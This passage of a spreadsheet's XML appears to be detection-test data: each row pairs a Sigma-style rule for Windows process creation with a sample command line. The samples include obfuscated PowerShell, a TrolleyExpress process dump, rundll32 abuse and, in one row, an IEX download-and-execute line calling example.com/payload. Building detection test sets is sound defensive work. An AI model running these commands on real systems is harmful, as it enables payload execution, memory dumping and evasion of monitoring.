      <c r="B2489" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C2489" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D2489" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E2489" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'dnammoc'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F2489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2489" s="43" t="n"/>
      <c r="J2489" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2489" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2490" ht="15.75" customHeight="1" s="42">
      <c r="A2490" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2490" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C2490" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D2490" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E2490" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'ekovn'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F2490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2490" s="43" t="n"/>
      <c r="J2490" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2490" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2491" ht="15.75" customHeight="1" s="42">
      <c r="A2491" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2491" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C2491" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D2491" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E2491" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'rahc'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F2491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2491" s="43" t="n"/>
      <c r="J2491" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2491" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2492" ht="15.75" customHeight="1" s="42">
      <c r="A2492" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2492" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C2492" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D2492" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E2492" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'golon'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F2492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2492" s="43" t="n"/>
      <c r="J2492" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2492" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2493" ht="15.75" customHeight="1" s="42">
      <c r="A2493" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2493" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C2493" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D2493" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E2493" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F2493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2493" s="43" t="n"/>
      <c r="J2493" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2493" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2494" ht="15.75" customHeight="1" s="42">
      <c r="A2494" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2494" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C2494" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D2494" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E2494" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { function Invoke-Command { param($cmd) iex $cmd } Invoke-Command ('Wri'+'te-H'+'ost ''Bypass'') }"</t>
        </is>
      </c>
      <c r="F2494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2494" s="43" t="n"/>
      <c r="J2494" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2494" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2495" ht="15.75" customHeight="1" s="42">
      <c r="A2495" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2495" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C2495" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D2495" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E2495" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $cmd = 'Write-Host'; &amp; $cmd 'Bypass' }"</t>
        </is>
      </c>
      <c r="F2495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2495" s="43" t="n"/>
      <c r="J2495" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2495" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2496" ht="15.75" customHeight="1" s="42">
      <c r="A2496" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2496" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2496" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2496" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2496" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101) | Join-String -Separator ''"</t>
        </is>
      </c>
      <c r="F2496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2496" s="43" t="n"/>
      <c r="J2496" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2496" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2497" ht="15.75" customHeight="1" s="42">
      <c r="A2497" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2497" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2497" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2497" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2497" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101 | ForEach-Object {[char]$_}) -join ''"</t>
        </is>
      </c>
      <c r="F2497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2497" s="43" t="n"/>
      <c r="J2497" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2497" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2498" ht="15.75" customHeight="1" s="42">
      <c r="A2498" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2498" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2498" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2498" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2498" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('U2t5c3NlcnZlciB0ZXN0')) | IEX"</t>
        </is>
      </c>
      <c r="F2498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2498" s="43" t="n"/>
      <c r="J2498" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2498" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2499" ht="15.75" customHeight="1" s="42">
      <c r="A2499" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2499" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2499" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2499" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2499" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F2499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2499" s="43" t="n"/>
      <c r="J2499" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2499" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2500" ht="15.75" customHeight="1" s="42">
      <c r="A2500" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2500" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2500" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2500" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2500" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F2500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2500" s="43" t="n"/>
      <c r="J2500" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2500" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2501" ht="15.75" customHeight="1" s="42">
      <c r="A2501" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2501" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2501" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2501" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2501" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetBytes('SGVsbG8gV29ybGQ='))"</t>
        </is>
      </c>
      <c r="F2501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2501" s="43" t="n"/>
      <c r="J2501" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2501" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2502" ht="15.75" customHeight="1" s="42">
      <c r="A2502" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2502" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2502" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2502" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2502" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetString([System.Text.Encoding]::ASCII.GetBytes('SGVsbG8gV29ybGQ=')))"</t>
        </is>
      </c>
      <c r="F2502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2502" s="43" t="n"/>
      <c r="J2502" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2502" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2503" ht="15.75" customHeight="1" s="42">
      <c r="A2503" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2503" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_autoit</t>
        </is>
      </c>
      <c r="C2503" s="43" t="inlineStr">
        <is>
          <t>Renamed AutoIt Execution</t>
        </is>
      </c>
      <c r="D2503" s="43" t="inlineStr">
        <is>
          <t>f4264e47-f522-4c38-a420-04525d5b880f</t>
        </is>
      </c>
      <c r="E2503" s="43" t="inlineStr">
        <is>
          <t>updater.exe -AutoIt3ExecuteScript script.au3</t>
        </is>
      </c>
      <c r="F2503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2503" s="43" t="n"/>
      <c r="J2503" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2503" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2504" ht="15.75" customHeight="1" s="42">
      <c r="A2504" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2504" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_autoit</t>
        </is>
      </c>
      <c r="C2504" s="43" t="inlineStr">
        <is>
          <t>Renamed AutoIt Execution</t>
        </is>
      </c>
      <c r="D2504" s="43" t="inlineStr">
        <is>
          <t>f4264e47-f522-4c38-a420-04525d5b880f</t>
        </is>
      </c>
      <c r="E2504" s="43" t="inlineStr">
        <is>
          <t>updater.exe script.au3 /ErrorStdOut</t>
        </is>
      </c>
      <c r="F2504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2504" s="43" t="n"/>
      <c r="J2504" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2504" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2505" ht="15.75" customHeight="1" s="42">
      <c r="A2505" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2505" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_autoit</t>
        </is>
      </c>
      <c r="C2505" s="43" t="inlineStr">
        <is>
          <t>Renamed AutoIt Execution</t>
        </is>
      </c>
      <c r="D2505" s="43" t="inlineStr">
        <is>
          <t>f4264e47-f522-4c38-a420-04525d5b880f</t>
        </is>
      </c>
      <c r="E2505" s="43" t="inlineStr">
        <is>
          <t>updater.exe script.au3 /AutoIt3ExecuteScript /ErrorStdOut</t>
        </is>
      </c>
      <c r="F2505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2505" s="43" t="n"/>
      <c r="J2505" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2505" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2506" ht="15.75" customHeight="1" s="42">
      <c r="A2506" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2506" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_autoit</t>
        </is>
      </c>
      <c r="C2506" s="43" t="inlineStr">
        <is>
          <t>Renamed AutoIt Execution</t>
        </is>
      </c>
      <c r="D2506" s="43" t="inlineStr">
        <is>
          <t>f4264e47-f522-4c38-a420-04525d5b880f</t>
        </is>
      </c>
      <c r="E2506" s="43" t="inlineStr">
        <is>
          <t>updater.exe script.au3 /AutoIt3ExecuteScript</t>
        </is>
      </c>
      <c r="F2506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2506" s="43" t="n"/>
      <c r="J2506" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2506" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2507" ht="15.75" customHeight="1" s="42">
      <c r="A2507" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2507" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C2507" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D2507" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E2507" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe "755"</t>
        </is>
      </c>
      <c r="F2507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2507" s="43" t="n"/>
      <c r="J2507" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2507" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2508" ht="15.75" customHeight="1" s="42">
      <c r="A2508" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2508" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C2508" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D2508" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E2508" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe -ma 755</t>
        </is>
      </c>
      <c r="F2508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2508" s="43" t="n"/>
      <c r="J2508" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2508" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2509" ht="15.75" customHeight="1" s="42">
      <c r="A2509" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2509" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C2509" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D2509" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E2509" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 1044</t>
        </is>
      </c>
      <c r="F2509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2509" s="43" t="n"/>
      <c r="J2509" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2509" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2510" ht="15.75" customHeight="1" s="42">
      <c r="A2510" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2510" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_execution_with_image_extension</t>
        </is>
      </c>
      <c r="C2510" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Execution With Image Extension</t>
        </is>
      </c>
      <c r="D2510" s="43" t="inlineStr">
        <is>
          <t>4aa6040b-3f28-44e3-a769-9208e5feb5ec</t>
        </is>
      </c>
      <c r="E2510" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\Public\\malicious.png</t>
        </is>
      </c>
      <c r="F2510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2510" s="43" t="n"/>
      <c r="J2510" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2510" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2511" ht="15.75" customHeight="1" s="42">
      <c r="A2511" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2511" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_sys</t>
        </is>
      </c>
      <c r="C2511" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Activity Invoking Sys File</t>
        </is>
      </c>
      <c r="D2511" s="43" t="inlineStr">
        <is>
          <t>731231b9-0b5d-4219-94dd-abb6959aa7ea</t>
        </is>
      </c>
      <c r="E2511" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe dummy.sys\.,EntryPoint</t>
        </is>
      </c>
      <c r="F2511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2511" s="43" t="n"/>
      <c r="J2511" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2511" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2512" ht="15.75" customHeight="1" s="42">
      <c r="A2512" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2512" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_sys</t>
        </is>
      </c>
      <c r="C2512" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Activity Invoking Sys File</t>
        </is>
      </c>
      <c r="D2512" s="43" t="inlineStr">
        <is>
          <t>731231b9-0b5d-4219-94dd-abb6959aa7ea</t>
        </is>
      </c>
      <c r="E2512" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe dummy.sys",EntryPoint</t>
        </is>
      </c>
      <c r="F2512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2512" s="43" t="n"/>
      <c r="J2512" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2512" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2513" ht="15.75" customHeight="1" s="42">
      <c r="A2513" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2513" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C2513" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D2513" s="43" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E2513" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile "C:\Users\Public\Downloads\example.udl"</t>
        </is>
      </c>
      <c r="F2513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2513" s="43" t="n"/>
      <c r="J2513" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2513" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2514" ht="15.75" customHeight="1" s="42">
      <c r="A2514" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2514" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C2514" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D2514" s="43" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E2514" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile "C:\Users\admin\Downloads\test.udl"</t>
        </is>
      </c>
      <c r="F2514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2514" s="43" t="n"/>
      <c r="J2514" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2514" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2515" ht="15.75" customHeight="1" s="42">
      <c r="A2515" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2515" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_powershell_execution_via_dll</t>
        </is>
      </c>
      <c r="C2515" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Execution Via DLL</t>
        </is>
      </c>
      <c r="D2515" s="43" t="inlineStr">
        <is>
          <t>6812a10b-60ea-420c-832f-dfcc33b646ba</t>
        </is>
      </c>
      <c r="E2515" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe PowerShdll.dll,main -c "I`e`x (New-Object Net.WebClient).D`o`wnloadString('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2515" s="43" t="n"/>
      <c r="J2515" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2515" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2516" ht="15.75" customHeight="1" s="42">
      <c r="A2516" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2516" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_powershell_execution_via_dll</t>
        </is>
      </c>
